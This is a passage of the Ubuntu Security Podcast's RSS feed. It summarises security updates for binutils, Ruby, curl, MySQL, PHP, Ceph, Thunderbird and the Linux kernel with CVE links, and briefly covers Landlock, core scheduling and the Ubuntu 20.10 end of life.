<li><a href="https://ubuntu.com/security/CVE-2017-14932">CVE-2017-14932</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14930">CVE-2017-14930</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14529">CVE-2017-14529</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14333">CVE-2017-14333</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14130">CVE-2017-14130</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14129">CVE-2017-14129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-14128">CVE-2017-14128</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-13710">CVE-2017-13710</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12967">CVE-2017-12967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12799">CVE-2017-12799</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12459">CVE-2017-12459</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12458">CVE-2017-12458</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12457">CVE-2017-12457</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12456">CVE-2017-12456</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12455">CVE-2017-12455</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12454">CVE-2017-12454</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12453">CVE-2017-12453</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12452">CVE-2017-12452</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12451">CVE-2017-12451</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12450">CVE-2017-12450</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12449">CVE-2017-12449</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2017-12448">CVE-2017-12448</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-6131">CVE-2016-6131</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-4493">CVE-2016-4493</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-4492">CVE-2016-4492</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-4491">CVE-2016-4491</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-4490">CVE-2016-4490</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-4489">CVE-2016-4489</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-4488">CVE-2016-4488</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-4487">CVE-2016-4487</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2016-2226">CVE-2016-2226</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Most CVEs fixed in a single update?</li>
<li>binutils gets a lot of CVEs which are generally low priority -
ie. objdump could crash or get code-exec if run on untrusted input - but
since is installed in a lot of common developer scenarious we often get
requests about these CVEs - even though they are unlikely to actually be
able to be exploited in most scenarios</li>
<li>Thanks to Leo on our team (and Marc for the original backport of a lot of
these patches)</li>
</ul>
<h3 id="usn-5020-1-ruby-vulnerabilities-10-24">[<a href="https://ubuntu.com/security/notices/USN-5020-1">USN-5020-1</a>] Ruby vulnerabilities [10:24]</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-32066">CVE-2021-32066</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31810">CVE-2021-31810</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31799">CVE-2021-31799</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>RCE, port scans / banner extractions, interpose on connections to bypass
TLS</li>
</ul>
<h3 id="usn-5021-1-curl-vulnerabilities-10-46">[<a href="https://ubuntu.com/security/notices/USN-5021-1">USN-5021-1</a>] curl vulnerabilities [10:46]</h3>
<ul>
<li>3 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22924">CVE-2021-22924</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22925">CVE-2021-22925</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-22898">CVE-2021-22898</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Failed to initialise data when handling TELNET connections - if these
structures happened to contain sensitive info -&gt; info leak</li>
<li>Could reuse connections from the connection pool in the wrong
circumstances, leading to reusing wrong connection and sending data to
wrong host</li>
</ul>
<h3 id="usn-5022-1-mysql-vulnerabilities-11-36">[<a href="https://ubuntu.com/security/notices/USN-5022-1">USN-5022-1</a>] MySQL vulnerabilities [11:36]</h3>
<ul>
<li>31 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-2441">CVE-2021-2441</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2440">CVE-2021-2440</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2437">CVE-2021-2437</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2429">CVE-2021-2429</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2427">CVE-2021-2427</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2426">CVE-2021-2426</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2425">CVE-2021-2425</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2424">CVE-2021-2424</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2422">CVE-2021-2422</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2418">CVE-2021-2418</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2417">CVE-2021-2417</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2410">CVE-2021-2410</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2402">CVE-2021-2402</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2399">CVE-2021-2399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2390">CVE-2021-2390</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2389">CVE-2021-2389</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2387">CVE-2021-2387</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2385">CVE-2021-2385</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2384">CVE-2021-2384</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2383">CVE-2021-2383</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2374">CVE-2021-2374</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2372">CVE-2021-2372</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2370">CVE-2021-2370</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2367">CVE-2021-2367</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2357">CVE-2021-2357</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2356">CVE-2021-2356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2354">CVE-2021-2354</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2352">CVE-2021-2352</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2342">CVE-2021-2342</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2340">CVE-2021-2340</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-2339">CVE-2021-2339</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>8.0.26 (focal, hirsute)</li>
<li>5.7.35 (bionic)</li>
</ul>
<h3 id="usn-5023-1-aspell-vulnerability-12-00">[<a href="https://ubuntu.com/security/notices/USN-5023-1">USN-5023-1</a>] Aspell vulnerability [12:00]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2019-25051">CVE-2019-25051</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Heap buffer overflow - fixed to actually validate size before using</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-20-dot-10-groovy-gorilla-eol-12-25">Ubuntu 20.10 Groovy Gorilla EOL [12:25]</h3>
<ul>
<li>as of July 22, 2021, Ubuntu 20.10 is no longer supported.</li>
<li>No more package updates will be accepted to 20.10</li>
<li>Will be archived to old-releases.ubuntu.com in the coming weeks</li>
<li>Upgrade to Hirsute - <a href="https://help.ubuntu.com/community/HirsuteUpgrades">https://help.ubuntu.com/community/HirsuteUpgrades</a></li>
<li><a href="https://lists.ubuntu.com/archives/ubuntu-security-announce/2021-July/006117.html">https://lists.ubuntu.com/archives/ubuntu-security-announce/2021-July/006117.html</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E124.mp3" length="11590829" type="audio/mpeg" /><itunes:duration>14:29</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 123
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-123/</link>
          <pubDate>Fri, 09 Jul 2021 13:48:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>53716e1d5454b19c35501c2028afa9831de625d0dc4f1dffbb8dbf9cd454d7a14fe9d9e86fadb2dc2a27bb8c9aac524370ccbecce9a3084dbf513daa1b34fe28</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 123</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          Is npm audit more harm than good? Plus this week we look at security
  updates for DjVuLibre, libuv, PHP and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  Is npm audit more harm than good? Plus this week we look at security
  updates for DjVuLibre, libuv, PHP and more.
  </itunes:summary>
        <description>  Is npm audit more harm than good? Plus this week we look at security
  updates for DjVuLibre, libuv, PHP and more.
  </description>
        <googleplay:description>  Is npm audit more harm than good? Plus this week we look at security
  updates for DjVuLibre, libuv, PHP and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>Is npm audit more harm than good? Plus this week we look at security
updates for DjVuLibre, libuv, PHP and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>8 unique CVEs addressed</p>
<h3 id="usn-4905-2-x-dot-org-x-server-vulnerability-00-42">[<a href="https://ubuntu.com/security/notices/USN-4905-2">USN-4905-2</a>] X.Org X Server vulnerability [00:42]</h3>
<ul>
<li>1 CVEs addressed in Trusty ESM (14.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3472">CVE-2021-3472</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-112/">Episode 112</a> - Local user (X client) could crash the server via Xinput
extension and ChangeFeedbackControl request - integer underflow -&gt; heap
buffer overflow</li>
</ul>
<h3 id="usn-5005-1-djvulibre-vulnerability-01-26">[<a href="https://ubuntu.com/security/notices/USN-5005-1">USN-5005-1</a>] DjVuLibre vulnerability [01:26]</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3630">CVE-2021-3630</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>OOB write via crafted djvu file -&gt; crash -&gt; DoS, RCE</li>
</ul>
<h3 id="usn-5007-1-libuv-vulnerability-01-53">[<a href="https://ubuntu.com/security/notices/USN-5007-1">USN-5007-1</a>] libuv vulnerability [01:53]</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22918">CVE-2021-22918</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Async event handling library - used by nodejs and others - supports async
handling TCP/UDP sockets, DNS resolution, file system operations etc</li>
<li>OOB read when converting strings to ASCII -&gt; can be triggered via calls
to uv_getaddrinfo() which are done by clients who handle TCP/UDP sockets
async (ie nodejs, Julia,, BIND etc)</li>
</ul>
<h3 id="usn-5006-1-php-vulnerabilities-03-04">[<a href="https://ubuntu.com/security/notices/USN-5006-1">USN-5006-1</a>] PHP vulnerabilities [03:04]</h3>
<ul>
<li>5 CVEs addressed in Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-21705">CVE-2021-21705</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21704">CVE-2021-21704</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-21702">CVE-2021-21702</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7071">CVE-2020-7071</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-7068">CVE-2020-7068</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF in PHAR archive handling - generally these are trusted so low impact</li>
<li>mishandling of URLs with embedded passwords - unspecified impact but
could misparse the URL and cause unwanted behaviour</li>
<li>Mishandling of XML when processing SOAP server responses -&gt; NULL ptr
deref (so malicious server could trigger a crash) -&gt; DoS</li>
<li>Ability to bypass Sever Side Request Forgery (SSRF) protections in
FILTER_VALIDATE_URL</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="npm-audit-broken-by-design-04-13">npm audit broken by design? [04:13]</h3>
<ul>
<li><a href="https://overreacted.io/npm-audit-broken-by-design/">https://overreacted.io/npm-audit-broken-by-design/</a></li>
</ul>
<h3 id="ubuntu-security-podcast-on-break-for-next-2-weeks-07-56">Ubuntu Security Podcast on break for next 2 weeks [07:56]</h3>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E123.mp3" length="7209464" type="audio/mpeg" /><itunes:duration>08:57</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 122
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-122/</link>
          <pubDate>Fri, 02 Jul 2021 16:14:00 +0930 </pubDate>
          <dc:creator></dc:creator>
          <guid>43c56fcd3783f92228384bee83e34fc2e0797191385e38aec46315a291f681f76d808ddee4ee6944a3c5bfdd5b3a3d8c29a7c1ab8b4f15e9fe1762b2acb7732d</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 122</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          This week we look at some new Linux kernel security features including the
  Landlock LSM and Core Scheduling plus we cover security updates for
  RabbitMQ, Ceph, Thunderbird and more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at some new Linux kernel security features including the
  Landlock LSM and Core Scheduling plus we cover security updates for
  RabbitMQ, Ceph, Thunderbird and more.
  </itunes:summary>
        <description>  This week we look at some new Linux kernel security features including the
  Landlock LSM and Core Scheduling plus we cover security updates for
  RabbitMQ, Ceph, Thunderbird and more.
  </description>
        <googleplay:description>  This week we look at some new Linux kernel security features including the
  Landlock LSM and Core Scheduling plus we cover security updates for
  RabbitMQ, Ceph, Thunderbird and more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some new Linux kernel security features including the
Landlock LSM and Core Scheduling plus we cover security updates for
RabbitMQ, Ceph, Thunderbird and more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>46 unique CVEs addressed</p>
<h3 id="usn-5004-1-rabbitmq-vulnerabilities-00-44">[<a href="https://ubuntu.com/security/notices/USN-5004-1">USN-5004-1</a>] RabbitMQ vulnerabilities [00:44]</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic (18.04 LTS), Focal (20.04 LTS), Groovy (20.10), Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-22116">CVE-2021-22116</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2019-11287">CVE-2019-11287</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>AMQP server written in Erlang</li>
<li>Possible to cause the server to consume excessive memory by sending large
values in the X-Reason HTTP header - resource exhaustion - DoS</li>
<li>Possible infinite loop - failed to perform sufficient validation - DoS</li>
</ul>
<h3 id="usn-4998-1-ceph-vulnerabilities-01-38">[<a href="https://ubuntu.com/security/notices/USN-4998-1">USN-4998-1</a>] Ceph vulnerabilities [01:38]</h3>
<ul>
<li>7 CVEs addressed in Focal (20.04 LTS), Groovy (20.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3531">CVE-2021-3531</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3524">CVE-2021-3524</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3509">CVE-2021-3509</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-20288">CVE-2021-20288</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27839">CVE-2020-27839</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-27781">CVE-2020-27781</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-25678">CVE-2020-25678</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>May log passwords in clear</li>
<li>Exposure of user credentials to unprivileged users in particular
configurations</li>
<li>2 different XSS in ceph-dashboard</li>
<li>Possible to authenticate as another user since could reuse session keys</li>
<li>Crash radosgw through malicious GET requests with crafted swift URLs -&gt;
DoS</li>
</ul>
<h3 id="usn-4995-2-thunderbird-vulnerabilities-02-22">[<a href="https://ubuntu.com/security/notices/USN-4995-2">USN-4995-2</a>] Thunderbird vulnerabilities [02:22]</h3>
<ul>
<li>20 CVEs addressed in Bionic (18.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-29957">CVE-2021-29957</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29956">CVE-2021-29956</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29949">CVE-2021-29949</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29948">CVE-2021-29948</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-24002">CVE-2021-24002</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23995">CVE-2021-23995</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23993">CVE-2021-23993</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23992">CVE-2021-23992</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23991">CVE-2021-23991</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23984">CVE-2021-23984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29967">CVE-2021-29967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29946">CVE-2021-29946</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-29945">CVE-2021-29945</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23999">CVE-2021-23999</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23998">CVE-2021-23998</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23994">CVE-2021-23994</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23987">CVE-2021-23987</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23982">CVE-2021-23982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23981">CVE-2021-23981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23961">CVE-2021-23961</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-121/">Episode 121</a></li>
<li>78.11.0</li>
</ul>
<h3 id="usn-5000-2-linux-kernel--kvm--vulnerabilities-02-48">[<a href="https://ubuntu.com/security/notices/USN-5000-2">USN-5000-2</a>] Linux kernel (KVM) vulnerabilities [02:48]</h3>
<ul>
<li>15 CVEs addressed in Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3506">CVE-2021-3506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33034">CVE-2021-33034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32399">CVE-2021-32399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31829">CVE-2021-31829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23134">CVE-2021-23134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23133">CVE-2021-23133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26147">CVE-2020-26147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26145">CVE-2020-26145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26141">CVE-2020-26141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26139">CVE-2020-26139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24588">CVE-2020-24588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24587">CVE-2020-24587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24586">CVE-2020-24586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33200">CVE-2021-33200</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="https://ubuntusecuritypodcast.org/episode-121/">Episode 121</a></li>
<li>KVM kernel for 20.04 LTS</li>
<li>2 high priority privesc issues fixed - CAN BCM UAFs, eBPF OOB write -
plus various others too</li>
</ul>
<h3 id="usn-4997-2-linux-kernel--kvm--vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-4997-2">USN-4997-2</a>] Linux kernel (KVM) vulnerabilities</h3>
<ul>
<li>17 CVEs addressed in Hirsute (21.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-3543">CVE-2021-3543</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3506">CVE-2021-3506</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33034">CVE-2021-33034</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-32399">CVE-2021-32399</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31829">CVE-2021-31829</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-31440">CVE-2021-31440</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23134">CVE-2021-23134</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-23133">CVE-2021-23133</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26147">CVE-2020-26147</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26145">CVE-2020-26145</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26141">CVE-2020-26141</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-26139">CVE-2020-26139</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24588">CVE-2020-24588</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24587">CVE-2020-24587</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-24586">CVE-2020-24586</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-33200">CVE-2021-33200</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-3609">CVE-2021-3609</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="landlock-released-in-5-dot-13-kernel-03-49">Landlock released in 5.13 kernel [03:49]</h3>
<ul>
<li>Allows unprivileged processes to sandbox themselves - currently only
supports file paths - so can specify read/write of files/dirs etc</li>
<li>Took 34 revisions of the patch set and it evolved significantly over
time - was originally based on attaching BPF programs to LSM hooks but
given how fraught unprivileged BPF has been this was NACKd and instead
went with a new approach based on a custom API with brand new system
calls to support it</li>
<li>API is quite low-level compared to say how AppArmor policy is specified
so will be interesting to see if there becomes a liblandlock in the
future to make this kind of thing easier (cf. libseccomp for doing
seccomp BPF programs etc)</li>
<li><a href="https://lwn.net/Articles/859908/">https://lwn.net/Articles/859908/</a></li>
<li><a href="https://landlock.io/">https://landlock.io/</a></li>
</ul>
<h3 id="core-scheduling-merged-for-5-dot-14-kernel-06-43">Core Scheduling merged for 5.14 kernel [06:43]</h3>
<ul>
<li>SMT siblings share lots of microarchitectural state like L1D cache etc -
various micro-arch attacks could only be mitigated across different SMT
cores - so processes which shared the same core could snoop on each other
(eg. L1TF - in the context of virtualisation, a malicious guest VM could
snoop on the L1D contents of another VM on the same SMT core) - so the
only option was to disable SMT which brings a big performance hit</li>
<li>Solution is core scheduling - ie. make the schedular aware of and respect
SMT threads on the same core</li>
<li>Tag processes via cgroups - this defines the trust boundaries - processes
in the same tagged cgroup share a trust boundary and can be scheduled on
sibling SMT cores - and by default all processes are in the same group</li>
<li>Uses prctl() to allow setting / copying these - and can only set these on
